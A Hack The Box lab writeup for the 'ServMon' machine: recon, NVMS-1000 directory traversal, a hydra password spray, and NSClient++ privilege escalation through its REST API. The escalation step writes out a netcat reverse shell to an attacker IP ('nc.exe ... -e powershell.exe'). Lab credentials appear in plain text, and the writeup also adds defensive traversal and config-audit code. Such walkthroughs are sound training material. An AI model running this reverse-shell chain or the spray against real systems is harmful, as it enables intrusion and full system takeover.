🕵 HTB-Writeup : SERVMON

Recon

nmap

└─$ nmap -T5 -p- -sV -A -Pn 10.10.10.184
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  07:35PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp    open  http
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

We are facing a Windows machine. Port 80 hosts a login page for an NVMS-1000 client. “NVMS-1000 is a monitoring client specifically designed for network video surveillance”.


Website login page at http://10.10.10.184/Pages/login.htm

Port 8443 hosts an NSClient++ web interface; a password is required to access its pages.


NSClient++ monitoring site at https://10.10.10.184:8443/index.html

ftp

As the nmap scan shows, anonymous login to the FTP server is allowed.

└─$ ftp anonymous@10.10.10.184
Connected to 10.10.10.184.

ftp> ls -alih
02-28-22  07:35PM  <DIR>  Users

ftp> ls -alih
02-28-22  07:36PM  <DIR>  Nadine
02-28-22  07:37PM  <DIR>  Nathan

02-28-22  07:36PM  182  Notes to do.txt  # Nathan
02-28-22  07:36PM  168  Confidential.txt # Nadine

We find two folders, Nathan and Nadine, each containing one text file.

Nadine - Confidential.txt

└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
Nadine                                                                                                             

A message addressed to Nathan. We now know that a Passwords.txt file may still be sitting on Nathan’s desktop.

Nathan - Notes_to_do.txt

└─$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Vulnerabilities

NVMS-1000

└─$ searchsploit nvms 1000                    
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal      | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal  | hardware/webapps/48311.py
------------------------------------- ---------------------------------

NVMS-1000 is vulnerable to directory traversal. If Nathan has not deleted the password file yet, we may be able to read it this way.

NSClient++

└─$ searchsploit nsclient                                                           
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution    | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                   | windows/local/46802.txt
------------------------------------------------------------- ---------------------------------

NSClient++ 0.5.2.35 is vulnerable to both a local privilege escalation and an authenticated remote code execution.

NVMS-1000

First, I test whether this NVMS-1000 instance is vulnerable to directory traversal.


Test of the directory traversal

We can read arbitrary files! Let’s grab the password file.


Directory traversal on Passwords.txt file

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Nathan forgot to delete the file :) We now have 7 passwords.
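The NVMS-1000 bug exploited above is a missing path normalisation on the web server side. As an added example (not code from the writeup or from NVMS-1000), here is the naive resolution pattern beside a hardened resolver that rejects traversal attempts, including URL-encoded, double-encoded and backslash variants; the web root and the sample requests are constructed for the example.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

WEBROOT = "/srv/nvms/www"  # assumed web root for this example


def naive_resolve(webroot: str, url_path: str) -> str:
    # The flaw class behind the NVMS-1000 traversal: the request path is glued
    # onto the web root as-is, so "../" segments walk out of the root.
    return webroot + "/" + url_path


def safe_resolve(webroot: str, url_path: str) -> Optional[str]:
    """Return the file path to serve, or None if the request must be rejected."""
    # Decode twice so a double-encoded %252e%252e becomes ".." before checking,
    # and fold Windows separators so "..\\" is treated like "../".
    decoded = unquote(unquote(url_path)).replace("\\", "/")
    if "\x00" in decoded:  # NUL byte is never a legitimate path component
        return None
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if ".." in segments:
        # Reject instead of silently clamping to the root, so the attempt can
        # be logged and alerted on rather than hidden as a 404.
        return None
    candidate = posixpath.normpath(posixpath.join(webroot, *segments))
    # Defence in depth: confirm the final path is still inside the web root.
    if posixpath.commonpath([webroot, candidate]) != webroot:
        return None
    return candidate


# Constructed requests: one legitimate page from the box and traversal variants.
SAMPLE_REQUESTS = [
    "Pages/login.htm",
    "../../../../Users/Nathan/Desktop/Passwords.txt",
    "..%2f..%2f..%2fWindows%2fwin.ini",
    "%252e%252e%252f%252e%252e%252fWindows%252fwin.ini",
    "..\\..\\Windows\\win.ini",
]


def triage(webroot: str, requests: list) -> dict:
    """Map each request to the path the hardened resolver would serve (None = rejected)."""
    return {r: safe_resolve(webroot, r) for r in requests}
```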

Bruteforce logins

Using hydra to spray the recovered passwords against both usernames, I found valid SSH credentials for Nadine.

└─$ hydra -L users -P pass 10.10.10.184 ssh
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk

nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
**************************6e904b 

We can get the user flag :)

Path to the privesc

Local recon

Now that we have a shell on the machine, we can retrieve the NSClient++ web password with the nscp command.

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

But we cannot log in remotely with that password.


Login failure using the admin password

Looking at the config file at C:\Program Files\NSClient++\nsclient.ini we found that only localhost is allowed to log in.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

I tried to upload WinPEAS, but Windows Defender deleted it.

NSClient++

As shown by the searchsploit results, NSClient++ has a privilege escalation vulnerability: a low-privileged user who can authenticate to the web interface can register external scripts that run with the service’s privileges.

From Nathan’s notes and our local recon, we know that NSClient++ access has been locked down: only localhost can reach the web interface.

Running the nscp test command shows the installed version, so we can check whether it is the vulnerable one.

PS C:\Program Files\NSClient++> .\nscp.exe test 

[...]
core NSClient++ - 0.5.2.35

Version 0.5.2.35 is the vulnerable release.

The exploit requires two modules to be enabled:

  • CheckExternalScripts
  • Scheduler

The nscp settings command lists the modules and their state.

PS C:\Program Files\NSClient++> .\nscp.exe settings --list --path /modules
/modules.CheckDisk=disabled
/modules.CheckEventLog=disabled
/modules.CheckExternalScripts=enabled
/modules.CheckHelpers=disabled
/modules.CheckNSCP=disabled
/modules.CheckSystem=disabled
/modules.CheckTaskSched=enabled
/modules.NRPEServer=enabled
/modules.Scheduler=enabled
/modules.WEBServer=enabled

Both needed modules are enabled.
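The writeup confirms the weak setup by reading nsclient.ini and the module list by hand. The following added Python audit (not part of the writeup or of NSClient++) automates the same checks: it parses an nsclient.ini whose keys mirror what was found on the box (the excerpt is constructed, and the section names are assumed to match the real file layout) and flags the module combination and settings that made this box exploitable.

```python
import configparser
from typing import List

# Constructed nsclient.ini excerpt. Keys and states mirror the writeup's
# findings; the section names are assumed to match the real file layout.
SAMPLE_INI = """
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled
CheckDisk = disabled

[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def parse_ini(text: str) -> configparser.ConfigParser:
    # nsclient.ini uses ';' comments and '=' separators; keep key case and
    # keys containing spaces ("allowed hosts") intact.
    cp = configparser.ConfigParser(comment_prefixes=(";", "#"), strict=False, interpolation=None)
    cp.optionxform = str
    cp.read_string(text)
    return cp


def audit(text: str) -> List[str]:
    """Return human-readable findings for the risky settings seen in the writeup."""
    cp = parse_ini(text)
    enabled = set()
    if cp.has_section("/modules"):
        enabled = {m for m, s in cp.items("/modules") if s.strip().lower() == "enabled"}
    settings = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    findings = []
    if {"WEBServer", "CheckExternalScripts"} <= enabled:
        findings.append("WEBServer + CheckExternalScripts: anyone holding the web password "
                        "can register and run scripts as the service account")
    if {"Scheduler", "CheckExternalScripts"} <= enabled:
        findings.append("Scheduler + CheckExternalScripts: registered scripts can also run on a schedule")
    if settings.get("password"):
        findings.append("web password is stored in plaintext in nsclient.ini; "
                        "only administrators should be able to read the file")
    hosts = {h.strip() for h in settings.get("allowed hosts", "").split(",") if h.strip()}
    if hosts - LOOPBACK:
        findings.append("allowed hosts permits non-loopback clients: " + ", ".join(sorted(hosts - LOOPBACK)))
    return findings
```

On this box the loopback restriction is present, so the audit reports the plaintext password and the two module combinations but not the allowed-hosts finding.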

Next, we create a batch script that launches a PowerShell reverse shell with nc. We first have to upload nc.exe to the target.

# send nc to the target (C:\Windows\Temp\c is a directory)
└─$ scp nc.exe nadine@10.10.10.184:"C:\Windows\Temp\c"

# create a bat script that contains
C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e powershell.exe

Now we have to register the script in the NSClient++ settings. I tried to add it from the command line, but that did not work.

PS C:\Program Files\NSClient++> .\nscp.exe settings --path "/settings/external scripts/scripts" --key "exploit.bat" --set "C:\Windows\Temp\nc.exe 10.10.16.11 4444 -e powershell.exe"

NSClient++ API

After some research, I found that NSClient++ exposes a REST API. The scripts API can be used to list, view and modify the scripts that NSClient++ can run.

First, I check whether we can reach the API from the box.

nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin https://localhost:8443/api/v1/scripts
Enter host password for user 'admin': ew2x6SsGTxjRwXOT
[{"module":"CheckExternalScripts","name":"ext","runtime_url":"https://localhost:8443/api/v1/scripts/ext","title":"CheckExternalScripts"}]

It works! Let’s add our script through the API.

nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/exploit.bat --data-binary "C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e powershell.exe"
Added exploit as scripts\exploit.bat

Let’s check that the script was written to the scripts directory.

PS C:\Program Files\NSClient++> ls .\scripts\

    Directory: C:\Program Files\NSClient++\scripts
[...]
-a----        9/17/2022   8:14 AM             57 exploit.bat

PS C:\Program Files\NSClient++> cat .\scripts\exploit.bat
C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e powershell.exe 

Our script is now registered. We can use the queries API to run it.

# make sure nc.exe has not been deleted by Windows Defender; it happened to me
curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://localhost:8443/api/v1/queries/exploit/commands/execute?time=10s"

# on the host
└─$ rlwrap nc -lvnp 4444
C:\Program Files\NSClient++>whoami
nt authority\system

It works! We now have a SYSTEM shell and can grab the root flag :)

C:\Users\Administrator\Desktop>type root.txt
**************************9622c5

Tags

Powershell, Easy, Internal, Apache, Penetration Tester Level 1, Local File Inclusion, CVE-2019-20085, A05:2021-Security Misconfiguration, Enumeration, FTP, Clear Text Credentials, A06:2021-Vulnerable And Outdated Components, Tunneling, SSH, CVE Exploitation, Public Vulnerabilities, NVMS-1000, Weak Permissions, NSClient++, Password Spraying, Port Forwarding, Anonymous/Guest Access